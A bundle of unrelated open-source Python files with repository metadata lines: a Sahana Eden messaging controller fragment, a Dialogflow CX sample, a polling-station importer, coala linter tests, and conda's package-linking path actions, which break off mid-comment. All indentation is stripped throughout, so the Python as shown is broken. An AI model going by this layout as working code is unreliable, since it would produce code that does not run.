s3.filter = (table.pe_id == auth.user.pe_id)
else:
redirect(URL(c="default", f="user", args="login",
vars={"_next": URL(c="msg", f="contact")}))
# These fields will be populated automatically
table.name.writable = table.name.readable = False
table.pe_id.writable = table.pe_id.readable = False
table.person_name.writable = table.person_name.readable = False
table.id.writable = False
#table.id.readable = False
def msg_contact_onvalidation(form):
# Add the person id to the record
if auth.user:
form.vars.pe_id = auth.user.pe_id
s3db.configure(table._tablename,
onvalidation = msg_contact_onvalidation)
def prep(r):
# Restrict update and delete access to contacts not owned by the user
if r.id :
pe_id = r.record.pe_id
if auth.user and auth.user.pe_id == pe_id:
return True
else:
session.error = T("Access denied")
return {"bypass": True, "output": redirect(URL(r=request))}
else:
return True
s3.prep = prep
response.menu_options = []
return s3_rest_controller("pr", "contact")
# -----------------------------------------------------------------------------
def search():
"""
Do a search of groups which match a type
- used for auto-completion
"""
if not (auth.is_logged_in() or auth.basic()):
# Not allowed
return
# JQuery UI Autocomplete uses 'term' instead of 'value'
# (old JQuery Autocomplete uses 'q' instead of 'value')
value = request.vars.term or request.vars.q
if not value:
return
# Call the search function
type = get_vars.get("type", None)
if type:
items = person_search(value, type)
else:
items = person_search(value)
# Encode in JSON
item = json.dumps(items)
response.headers["Content-Type"] = "application/json"
return item
# -----------------------------------------------------------------------------
def recipient_represent(id, default_label=""):
""" Simplified output as-compared to pr_pentity_represent """
output = ""
table = s3db.pr_pentity
pe = db(table.pe_id == id).select(table.instance_type,
limitby = (0, 1),
).first()
if not pe:
return output
instance_type = pe.instance_type
table = db.get(instance_type, None)
if not table:
return output
if instance_type == "pr_person":
person = db(table.pe_id == id).select(table.first_name,
table.middle_name,
table.last_name,
limitby = (0, 1),
).first()
if person:
output = s3_fullname(person)
elif instance_type == "pr_group":
group = db(table.pe_id == id).select(table.name,
limitby = (0, 1),
).first()
if group:
output = group.name
return output
# -----------------------------------------------------------------------------
def person_search(value, type=None):
""" Search for People & Groups which match a search term """
# Shortcuts
groups = s3db.pr_group
persons = s3db.pr_person
items = []
# We want to do case-insensitive searches
# (default anyway on MySQL/SQLite, but not PostgreSQL)
value = value.lower()
if type:
represent = recipient_represent
else:
represent = s3db.pr_pentity_represent
if type == "pr_group" or not type:
# Check Groups
query = (groups["name"].lower().like("%" + value + "%")) & (groups.deleted == False)
rows = db(query).select(groups.pe_id)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
if type == "pr_person" or not type:
# Check Persons
deleted = (persons.deleted == False)
# First name
query = (persons["first_name"].lower().like("%" + value + "%")) & deleted
rows = db(query).select(persons.pe_id, cache=s3db.cache)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
# Middle name
query = (persons["middle_name"].lower().like("%" + value + "%")) & deleted
rows = db(query).select(persons.pe_id, cache=s3db.cache)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
# Last name
query = (persons["last_name"].lower().like("%" + value + "%")) & deleted
rows = db(query).select(persons.pe_id, cache=s3db.cache)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
return items
# -----------------------------------------------------------------------------
def subscription():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
# Send Outbound Messages (was for being called via cron, now useful for debugging)
# -----------------------------------------------------------------------------
def process_email_outbox():
""" Send Pending Email Messages """
msg.process_outbox(contact_method = "EMAIL")
# -----------------------------------------------------------------------------
def process_sms_outbox():
""" Send Pending SMS Messages """
msg.process_outbox(contact_method = "SMS")
# -----------------------------------------------------------------------------
def process_twitter_outbox():
""" Send Pending Twitter Messages """
msg.process_outbox(contact_method = "TWITTER")
# =============================================================================
# Enabled only for testing:
#
@auth.s3_requires_membership(1)
def facebook_post():
""" Post to Facebook """
title = T("Post to Facebook")
# Test the formstyle
formstyle = s3.crud.formstyle
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "channel_id"
label = LABEL("%s:" % T("Channel"))
table = s3db.msg_facebook_channel
query = (table.deleted == False) & \
(table.enabled == True)
rows = db(query).select(table.channel_id, table.name)
options = [OPTION(row.name, _value=row.channel_id) for row in rows]
channel_select = SELECT(_name = "channel_id",
_id = _id,
*options
)
widget = channel_select
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "post"
label = LABEL("%s:" % T("Contents"))
widget = TEXTAREA(_name = "post",
)
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Post"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(request.vars, session):
form_vars = form.vars
channel_id = form_vars.get("channel_id")
post = form_vars.get("post")
if channel_id and post:
msg.post_to_facebook(post, channel_id)
output = {"form": form,
"title": title,
}
return output
# =============================================================================
# Enabled only for testing:
#
@auth.s3_requires_membership(1)
def twitter_post():
""" Post to Twitter """
title = T("Post to Twitter")
# Test the formstyle
formstyle = s3.crud.formstyle
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "channel_id"
label = LABEL("%s:" % T("Channel"))
table = s3db.msg_twitter_channel
query = (table.deleted == False) & \
(table.enabled == True)
rows = db(query).select(table.channel_id, table.name)
options = [OPTION(row.name, _value=row.channel_id) for row in rows]
channel_select = SELECT(_name = "channel_id",
_id = _id,
*options
)
widget = channel_select
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "post"
label = LABEL("%s:" % T("Contents"))
widget = TEXTAREA(_name = "post",
)
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Post"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(request.vars, session):
form_vars = form.vars
channel_id = form_vars.get("channel_id")
post = form_vars.get("post")
if channel_id and post:
msg.send_tweet(post)
output = {"form": form,
"title": title,
}
return output
# =============================================================================
# Enabled only for testing:
#
@auth.s3_requires_membership(1)
def tag():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
# Enabled only for testing:
#
def readKeyGraph(queryID):
""" """
import os
curpath = os.getcwd()
f = open("%s.txt" % queryID, "r")
topics = int(next(f))
nodelabel = {}
E = []
nodetopic = {}
for x in range(0, topics):
thisnodes = []
nodes = int(next(f).split("KEYGRAPH_NODES:")[1])
for y in range(0, nodes):
s = next(f)
nodeid = s.split(":")[0]
nodetopic[str(nodeid)] = x
l1 = s.split(":")[1]
l2 = s.split(":")[2]
try:
nodelabel[str(nodeid)] = unicode(l2.strip())
except:
pass
edges = int(next(f).split("KEYGRAPH_EDGES:")[1])
edges = edges / 2
for y in range(0,edges):
s = next(f)
n1 = s.split(" ")[0].strip()
n2 = s.split(" ")[1].strip()
if (n1 in nodelabel.keys()) and (n2 in nodelabel.keys()):
E.append((str(n1), str(n2)))
next(f)
next(f)
"""
for x in range(0,len(E)):
lx = list(E[x])
lx.append((nodetopic[E[x][0]] - nodetopic[E[x][1]] + 3)*100)
E[x] = tuple(lx)
"""
#import networkx as nx
from igraph import Graph, write_svg
#g = nx.Graph()
g = Graph()
g.add_vertices([ str(s) for s in nodelabel.keys()])
#g.add_nodes_from(nodelabel)
g.add_edges(E)
g.vs["name"] = list(nodelabel.values())
g.vs["label"] = g.vs["name"]
g.vs["doc_id"] = list(nodelabel.keys())
layout = g.layout_lgl()
#layout = g.layout_kamada_kawai()
visual_style = {}
visual_style["vertex_size"] = 20
#visual_style["vertex_color"] = [color_dict[gender] for gender in g.vs["gender"]]
visual_style["vertex_label"] = g.vs["name"]
#visual_style["edge_width"] = [1 + 2 * int(len(is_formal)) for is_formal in g.vs["label"]]
visual_style["layout"] = layout
visual_style["bbox"] = (2000, 2000)
visual_style["margin"] = 20
#plot(g, **visual_style)
#c = g.clusters().subgraphs()
filename = "%s.svg" % queryID
write_svg(g.community_fastgreedy().as_clustering().graph, layout=layout, **visual_style)
#plot(g.community_fastgreedy().as_clustering(), layout=layout)
#plot(g)
#g.add_weighted_edges_from(E)
#nx.relabel_nodes(g, nodelabel, copy=False)
#nx.draw(g, node_size=100, font_size=8, edge_size=10000)
#labels = nx.draw_networkx_labels(g,pos=nx.spring_layout(g),labels=nodelabel)
#import matplotlib.pyplot as plt
#plt.savefig('kg3.png', facecolor='w', edgecolor='w',orientation='portrait', papertype=None, format=None,transparent=False, bbox_inches=None, pad_inches=0.1)
#plt.show()
# END ================================================================================
|
flavour/eden
|
controllers/msg.py
|
Python
|
mit
| 87,816
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetTestCase
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflowcx
# [START dialogflow_v3_generated_TestCases_GetTestCase_async]
from google.cloud import dialogflowcx_v3
async def sample_get_test_case():
# Create a client
client = dialogflowcx_v3.TestCasesAsyncClient()
# Initialize request argument(s)
request = dialogflowcx_v3.GetTestCaseRequest(
name="name_value",
)
# Make the request
response = await client.get_test_case(request=request)
# Handle the response
print(response)
# [END dialogflow_v3_generated_TestCases_GetTestCase_async]
|
googleapis/python-dialogflow-cx
|
samples/generated_samples/dialogflow_v3_generated_test_cases_get_test_case_async.py
|
Python
|
apache-2.0
| 1,463
|
from data_collection.management.commands import BaseHalaroseCsvImporter
class Command(BaseHalaroseCsvImporter):
council_id = 'E07000061'
addresses_name = 'parl.2017-06-08/Version 1/Eastbourne polling_station_export-2017-05-25.csv'
stations_name = 'parl.2017-06-08/Version 1/Eastbourne polling_station_export-2017-05-25.csv'
elections = ['parl.2017-06-08']
|
chris48s/UK-Polling-Stations
|
polling_stations/apps/data_collection/management/commands/import_eastbourne.py
|
Python
|
bsd-3-clause
| 387
|
from bears.c_languages.CPPLintBear import CPPLintBear
from coalib.testing.LocalBearTestHelper import verify_local_bear
test_file = """
int main() {
return 0;
}
"""
test_file2 = ('int main() {\n' +
' int x;\n' +
' x = 3;' * 100 + '\n'
' return 0;\n' +
'}\n')
CPPLintBearTest = verify_local_bear(CPPLintBear,
valid_files=(),
invalid_files=(test_file,),
tempfile_kwargs={'suffix': '.cpp'})
CPPLintBearIgnoreConfigTest = verify_local_bear(
CPPLintBear,
valid_files=(test_file,),
invalid_files=(),
settings={'cpplint_ignore': 'legal/copyright'},
tempfile_kwargs={'suffix': '.cpp'})
CPPLintBearLineLengthConfigTest = verify_local_bear(
CPPLintBear,
valid_files=(),
invalid_files=(test_file,),
settings={'cpplint_ignore': 'legal/copyright',
'max_line_length': '13'},
tempfile_kwargs={'suffix': '.cpp'})
CPPLintBearInfiniteLineLengthTest = verify_local_bear(
CPPLintBear,
valid_files=(test_file2,),
invalid_files=(),
settings={'max_line_length': '0',
'cpplint_ignore': 'legal/copyright'},
tempfile_kwargs={'suffix': '.cpp'})
|
coala-analyzer/coala-bears
|
tests/c_languages/CPPLintBearTest.py
|
Python
|
agpl-3.0
| 1,288
|
from golem.rpc.mapping.aliases import *
GUI_EVENT_MAP = dict(
config_changed= Environment.evt_opts_changed,
test_task_status= Task.evt_task_test_status,
task_status_changed= Task.evt_task_status,
connection_status_changed= Network.evt_connection,
lock_config= UI.evt_lock_config,
)
|
scorpilix/Golemtest
|
golem/rpc/mapping/gui.py
|
Python
|
gpl-3.0
| 371
|
from .classes import Check, Is
|
csparpa/check
|
fluentcheck/__init__.py
|
Python
|
mit
| 31
|
import json
def readJSON(json_file_path):
json_file = open(json_file_path, 'r')
return json.load(json_file)
if __name__ == '__main__':
print readJSON('../../data/gen_hierarchies/SexGH.json')
|
cassinius/mlhi-ass2-anonymization
|
src/io/jsonInput.py
|
Python
|
apache-2.0
| 206
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from abc import ABCMeta, abstractmethod, abstractproperty
from errno import EXDEV
from logging import getLogger
from os.path import basename, dirname, getsize, join
import re
from uuid import uuid4
from .envs_manager import USER_ENVIRONMENTS_TXT_FILE, register_env, unregister_env
from .portability import _PaddingError, update_prefix
from .prefix_data import PrefixData
from .._vendor.auxlib.compat import with_metaclass
from .._vendor.auxlib.ish import dals
from ..base.constants import CONDA_TARBALL_EXTENSION
from ..base.context import context
from ..common.compat import iteritems, on_win, text_type
from ..common.path import (get_bin_directory_short_path, get_leaf_directories,
get_python_noarch_target_path, get_python_short_path,
parse_entry_point_def,
pyc_path, url_to_path, win_path_ok)
from ..common.url import has_platform, path_to_url, unquote
from ..exceptions import CondaUpgradeError, CondaVerificationError, PaddingError, SafetyError
from ..gateways.connection.download import download
from ..gateways.disk.create import (compile_pyc, copy, create_hard_link_or_copy,
create_link, create_python_entry_point, extract_tarball,
make_menu, write_as_json_to_file)
from ..gateways.disk.delete import rm_rf, try_rmdir_all_empty
from ..gateways.disk.permissions import make_writable
from ..gateways.disk.read import (compute_md5sum, compute_sha256sum, islink, lexists,
read_index_json)
from ..gateways.disk.update import backoff_rename, touch
from ..history import History
from ..models.channel import Channel
from ..models.enums import LinkType, NoarchType, PathType
from ..models.match_spec import MatchSpec
from ..models.records import (Link, PackageCacheRecord, PackageRecord, PathDataV1, PathsData,
PrefixRecord)
try:
from cytoolz.itertoolz import concat, concatv
except ImportError: # pragma: no cover
from .._vendor.toolz.itertoolz import concat, concatv # NOQA
log = getLogger(__name__)
REPR_IGNORE_KWARGS = (
'transaction_context',
'package_info',
'hold_path',
)
@with_metaclass(ABCMeta)
class PathAction(object):
_verified = False
@abstractmethod
def verify(self):
# if verify fails, it should return an exception object rather than raise
# at the end of a verification run, all errors will be raised as a CondaMultiError
# after successful verification, the verify method should set self._verified = True
raise NotImplementedError()
@abstractmethod
def execute(self):
raise NotImplementedError()
@abstractmethod
def reverse(self):
raise NotImplementedError()
@abstractmethod
def cleanup(self):
raise NotImplementedError()
@abstractproperty
def target_full_path(self):
raise NotImplementedError()
@property
def verified(self):
return self._verified
def __repr__(self):
args = ('%s=%r' % (key, value) for key, value in iteritems(vars(self))
if key not in REPR_IGNORE_KWARGS)
return "%s(%s)" % (self.__class__.__name__, ', '.join(args))
@with_metaclass(ABCMeta)
class PrefixPathAction(PathAction):
def __init__(self, transaction_context, target_prefix, target_short_path):
self.transaction_context = transaction_context
self.target_prefix = target_prefix
self.target_short_path = target_short_path
@property
def target_full_path(self):
trgt, shrt_pth = self.target_prefix, self.target_short_path
if trgt is not None and shrt_pth is not None:
return join(trgt, win_path_ok(shrt_pth))
else:
return None
# ######################################################
# Creation of Paths within a Prefix
# ######################################################
@with_metaclass(ABCMeta)
class CreateInPrefixPathAction(PrefixPathAction):
# All CreatePathAction subclasses must create a SINGLE new path
# the short/in-prefix version of that path must be returned by execute()
def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
target_prefix, target_short_path):
super(CreateInPrefixPathAction, self).__init__(transaction_context,
target_prefix, target_short_path)
self.package_info = package_info
self.source_prefix = source_prefix
self.source_short_path = source_short_path
def verify(self):
self._verified = True
def cleanup(self):
# create actions typically won't need cleanup
pass
@property
def source_full_path(self):
prfx, shrt_pth = self.source_prefix, self.source_short_path
return join(prfx, win_path_ok(shrt_pth)) if prfx and shrt_pth else None
# @with_metaclass(ABCMeta)
# class CreateLeasedPathAction(CreateInPrefixPathAction):
# def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path):
# super(CreateLeasedPathAction, self).__init__(transaction_context, package_info,
# source_prefix, source_short_path,
# target_prefix, target_short_path)
# self.leased_path_entry = LeasedPathEntry(
# _path=target_short_path,
# target_path=self.source_full_path,
# target_prefix=source_prefix,
# leased_path=self.target_full_path,
# package_name=package_info.index_json_record.name,
# leased_path_type=self.leased_path_type,
# )
# self._execute_successful = False
#
# def reverse(self):
# if self._execute_successful:
# log.trace("reversing leased path creation %s", self.target_full_path)
# rm_rf(self.target_full_path)
#
# @abstractproperty
# def leased_path_type(self):
# raise NotImplementedError()
class LinkPathAction(CreateInPrefixPathAction):
@classmethod
def create_file_link_actions(cls, transaction_context, package_info, target_prefix,
requested_link_type):
def get_prefix_replace(source_path_data):
if source_path_data.path_type == PathType.softlink:
link_type = LinkType.copy
prefix_placehoder, file_mode = '', None
elif source_path_data.prefix_placeholder:
link_type = LinkType.copy
prefix_placehoder = source_path_data.prefix_placeholder
file_mode = source_path_data.file_mode
elif source_path_data.no_link:
link_type = LinkType.copy
prefix_placehoder, file_mode = '', None
else:
link_type = requested_link_type
prefix_placehoder, file_mode = '', None
return link_type, prefix_placehoder, file_mode
def make_file_link_action(source_path_data):
# TODO: this inner function is still kind of a mess
noarch = package_info.index_json_record.noarch
if noarch == NoarchType.python:
sp_dir = transaction_context['target_site_packages_short_path']
target_short_path = get_python_noarch_target_path(source_path_data.path, sp_dir)
elif noarch is None or noarch == NoarchType.generic:
target_short_path = source_path_data.path
else:
raise CondaUpgradeError(dals("""
The current version of conda is too old to install this package.
Please update conda."""))
link_type, placeholder, fmode = get_prefix_replace(source_path_data)
if placeholder:
return PrefixReplaceLinkAction(transaction_context, package_info,
package_info.extracted_package_dir,
source_path_data.path,
target_prefix, target_short_path,
requested_link_type,
placeholder, fmode, source_path_data)
else:
return LinkPathAction(transaction_context, package_info,
package_info.extracted_package_dir, source_path_data.path,
target_prefix, target_short_path,
link_type, source_path_data)
return tuple(make_file_link_action(spi) for spi in package_info.paths_data.paths)
@classmethod
def create_directory_actions(cls, transaction_context, package_info, target_prefix,
requested_link_type, file_link_actions):
leaf_directories = get_leaf_directories(axn.target_short_path for axn in file_link_actions)
return tuple(
cls(transaction_context, package_info, None, None,
target_prefix, directory_short_path, LinkType.directory, None)
for directory_short_path in leaf_directories
)
@classmethod
def create_python_entry_point_windows_exe_action(cls, transaction_context, package_info,
target_prefix, requested_link_type,
entry_point_def):
source_directory = context.conda_prefix
source_short_path = 'Scripts/conda.exe'
command, _, _ = parse_entry_point_def(entry_point_def)
target_short_path = "Scripts/%s.exe" % command
source_path_data = PathDataV1(
_path=target_short_path,
path_type=PathType.windows_python_entry_point_exe,
)
return cls(transaction_context, package_info, source_directory,
source_short_path, target_prefix, target_short_path,
requested_link_type, source_path_data)
def __init__(self, transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path, link_type, source_path_data):
super(LinkPathAction, self).__init__(transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path)
self.link_type = link_type
self._execute_successful = False
self.source_path_data = source_path_data
self.prefix_path_data = None
def verify(self):
if self.link_type != LinkType.directory and not lexists(self.source_full_path): # pragma: no cover # NOQA
return CondaVerificationError(dals("""
The package for %s located at %s
appears to be corrupted. The path '%s'
specified in the package manifest cannot be found.
""" % (self.package_info.index_json_record.name,
self.package_info.extracted_package_dir,
self.source_short_path)))
source_path_data = self.source_path_data
try:
source_path_type = source_path_data.path_type
except AttributeError:
source_path_type = None
if source_path_type in PathType.basic_types:
# this let's us keep the non-generic path types like windows_python_entry_point_exe
source_path_type = None
if self.link_type == LinkType.directory:
self.prefix_path_data = None
elif self.link_type == LinkType.softlink:
self.prefix_path_data = PathDataV1.from_objects(
self.source_path_data,
path_type=source_path_type or PathType.softlink,
)
elif self.link_type == LinkType.copy and source_path_data.path_type == PathType.softlink:
self.prefix_path_data = PathDataV1.from_objects(
self.source_path_data,
path_type=source_path_type or PathType.softlink,
)
elif source_path_data.path_type == PathType.hardlink:
try:
reported_sha256 = source_path_data.sha256
except AttributeError:
reported_sha256 = None
source_sha256 = compute_sha256sum(self.source_full_path)
if reported_sha256 and reported_sha256 != source_sha256:
return SafetyError(dals("""
The package for %s located at %s
appears to be corrupted. The path '%s'
has a sha256 mismatch.
reported sha256: %s
actual sha256: %s
""" % (self.package_info.index_json_record.name,
self.package_info.extracted_package_dir,
self.source_short_path,
reported_sha256,
source_sha256,
)))
try:
reported_size_in_bytes = source_path_data.size_in_bytes
except AttributeError:
reported_size_in_bytes = None
if reported_size_in_bytes:
source_size_in_bytes = getsize(self.source_full_path)
if reported_size_in_bytes != source_size_in_bytes:
return SafetyError(dals("""
The package for %s located at %s
appears to be corrupted. The path '%s'
has an incorrect size.
reported size: %s bytes
actual size: %s bytes
""" % (self.package_info.index_json_record.name,
self.package_info.extracted_package_dir,
self.source_short_path,
reported_size_in_bytes,
source_size_in_bytes,
)))
self.prefix_path_data = PathDataV1.from_objects(
source_path_data,
sha256=reported_sha256,
sha256_in_prefix=reported_sha256,
path_type=source_path_type or PathType.hardlink,
)
elif source_path_data.path_type == PathType.windows_python_entry_point_exe:
self.prefix_path_data = source_path_data
else:
raise NotImplementedError()
self._verified = True
def execute(self):
log.trace("linking %s => %s", self.source_full_path, self.target_full_path)
create_link(self.source_full_path, self.target_full_path, self.link_type,
force=context.force)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("reversing link creation %s", self.target_prefix)
if self.link_type == LinkType.directory:
try_rmdir_all_empty(self.target_full_path)
else:
rm_rf(self.target_full_path)
class PrefixReplaceLinkAction(LinkPathAction):
def __init__(self, transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path,
link_type,
prefix_placeholder, file_mode, source_path_data):
# This link_type used in execute(). Make sure we always respect LinkType.copy request.
link_type = LinkType.copy if link_type == LinkType.copy else LinkType.hardlink
super(PrefixReplaceLinkAction, self).__init__(transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path,
link_type, source_path_data)
self.prefix_placeholder = prefix_placeholder
self.file_mode = file_mode
self.intermediate_path = None
def verify(self):
validation_error = super(PrefixReplaceLinkAction, self).verify()
if validation_error:
return validation_error
if islink(self.source_full_path):
log.trace("ignoring prefix update for symlink with source path %s",
self.source_full_path)
# return
assert False, "I don't think this is the right place to ignore this"
self.intermediate_path = join(self.transaction_context['temp_dir'], text_type(uuid4()))
log.trace("copying %s => %s", self.source_full_path, self.intermediate_path)
create_link(self.source_full_path, self.intermediate_path, LinkType.copy)
make_writable(self.intermediate_path)
try:
log.trace("rewriting prefixes in %s", self.target_full_path)
update_prefix(self.intermediate_path,
context.target_prefix_override or self.target_prefix,
self.prefix_placeholder,
self.file_mode)
except _PaddingError:
raise PaddingError(self.target_full_path, self.prefix_placeholder,
len(self.prefix_placeholder))
sha256_in_prefix = compute_sha256sum(self.intermediate_path)
self.prefix_path_data = PathDataV1.from_objects(
self.prefix_path_data,
file_mode=self.file_mode,
path_type=PathType.hardlink,
prefix_placeholder=self.prefix_placeholder,
sha256_in_prefix=sha256_in_prefix,
)
self._verified = True
def execute(self):
if not self._verified:
self.verify()
source_path = self.intermediate_path or self.source_full_path
log.trace("linking %s => %s", source_path, self.target_full_path)
create_link(source_path, self.target_full_path, self.link_type)
self._execute_successful = True
class MakeMenuAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type):
if on_win and context.shortcuts:
MENU_RE = re.compile(r'^menu/.*\.json$', re.IGNORECASE)
return tuple(cls(transaction_context, package_info, target_prefix, spi.path)
for spi in package_info.paths_data.paths if bool(MENU_RE.match(spi.path)))
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix, target_short_path):
super(MakeMenuAction, self).__init__(transaction_context, package_info,
None, None, target_prefix, target_short_path)
self._execute_successful = False
def execute(self):
log.trace("making menu for %s", self.target_full_path)
make_menu(self.target_prefix, self.target_short_path, remove=False)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("removing menu for %s", self.target_full_path)
make_menu(self.target_prefix, self.target_short_path, remove=True)
class CreateNonadminAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type):
if on_win and lexists(join(context.root_prefix, '.nonadmin')):
return cls(transaction_context, package_info, target_prefix),
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix):
super(CreateNonadminAction, self).__init__(transaction_context, package_info, None, None,
target_prefix, '.nonadmin')
self._file_created = False
def execute(self):
log.trace("touching nonadmin %s", self.target_full_path)
self._file_created = touch(self.target_full_path)
def reverse(self):
if self._file_created:
log.trace("removing nonadmin file %s", self.target_full_path)
rm_rf(self.target_full_path)
class CompilePycAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type,
file_link_actions):
noarch = package_info.package_metadata and package_info.package_metadata.noarch
if noarch is not None and noarch.type == NoarchType.python:
noarch_py_file_re = re.compile(r'^site-packages[/\\][^\t\n\r\f\v]+\.py$')
py_ver = transaction_context['target_python_version']
py_files = (axn.target_short_path for axn in file_link_actions
if noarch_py_file_re.match(axn.source_short_path))
return tuple(cls(transaction_context, package_info, target_prefix,
pf, pyc_path(pf, py_ver))
for pf in py_files)
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix,
source_short_path, target_short_path):
super(CompilePycAction, self).__init__(transaction_context, package_info,
target_prefix, source_short_path,
target_prefix, target_short_path)
self.prefix_path_data = PathDataV1(
_path=self.target_short_path,
path_type=PathType.pyc_file,
)
self._execute_successful = False
def execute(self):
# compile_pyc is sometimes expected to fail, for example a python 3.6 file
# installed into a python 2 environment, but no code paths actually importing it
# technically then, this file should be removed from the manifest in conda-meta, but
# at the time of this writing that's not currently happening
log.trace("compiling %s", self.target_full_path)
target_python_version = self.transaction_context['target_python_version']
python_short_path = get_python_short_path(target_python_version)
python_full_path = join(self.target_prefix, win_path_ok(python_short_path))
compile_pyc(python_full_path, self.source_full_path, self.target_full_path)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("reversing pyc creation %s", self.target_full_path)
rm_rf(self.target_full_path)
class CreatePythonEntryPointAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type):
noarch = package_info.package_metadata and package_info.package_metadata.noarch
if noarch is not None and noarch.type == NoarchType.python:
def this_triplet(entry_point_def):
command, module, func = parse_entry_point_def(entry_point_def)
target_short_path = "%s/%s" % (get_bin_directory_short_path(), command)
if on_win:
target_short_path += "-script.py"
return target_short_path, module, func
actions = tuple(cls(transaction_context, package_info, target_prefix,
*this_triplet(ep_def))
for ep_def in noarch.entry_points or ())
if on_win: # pragma: unix no cover
actions += tuple(
LinkPathAction.create_python_entry_point_windows_exe_action(
transaction_context, package_info, target_prefix,
requested_link_type, ep_def
) for ep_def in noarch.entry_points or ()
)
return actions
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix, target_short_path,
module, func):
super(CreatePythonEntryPointAction, self).__init__(transaction_context, package_info,
None, None,
target_prefix, target_short_path)
self.module = module
self.func = func
if on_win:
path_type = PathType.windows_python_entry_point_script
else:
path_type = PathType.unix_python_entry_point
self.prefix_path_data = PathDataV1(
_path=self.target_short_path,
path_type=path_type,
)
self._execute_successful = False
def execute(self):
log.trace("creating python entry point %s", self.target_full_path)
if on_win:
python_full_path = None
else:
target_python_version = self.transaction_context['target_python_version']
python_short_path = get_python_short_path(target_python_version)
python_full_path = join(self.target_prefix, win_path_ok(python_short_path))
create_python_entry_point(self.target_full_path, python_full_path,
self.module, self.func)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("reversing python entry point creation %s", self.target_full_path)
rm_rf(self.target_full_path)
# class CreateApplicationEntryPointWindowsExeAction(LinkPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type, # NOQA
# exe_path):
# source_directory = context.conda_prefix
# source_short_path = 'Scripts/conda.exe'
# target_short_path = exe_path
# return cls(transaction_context, package_info, source_directory,
# source_short_path, target_prefix, target_short_path, requested_link_type)
#
# def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path, requested_link_type):
# super(CreateApplicationEntryPointWindowsExeAction, self).__init__(
# transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path, requested_link_type,
# )
# self.leased_path_entry = LeasedPathEntry(
# _path=target_short_path,
# target_path=self.source_full_path,
# target_prefix=source_prefix,
# leased_path=self.target_full_path,
# package_name=package_info.index_json_record.name,
# leased_path_type=self.leased_path_type,
# )
#
# @property
# def leased_path_type(self):
# return LeasedPathType.application_entry_point_windows_exe
# class CreateApplicationEntryPointAction(CreateLeasedPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type): # NOQA
